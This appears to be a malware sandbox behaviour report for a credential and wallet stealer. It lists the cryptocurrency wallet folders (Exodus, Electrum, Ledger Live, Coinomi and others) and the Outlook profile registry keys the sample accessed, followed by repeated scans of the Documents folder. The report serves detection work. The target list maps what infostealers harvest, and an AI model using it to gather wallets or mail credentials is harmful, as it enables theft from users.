Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
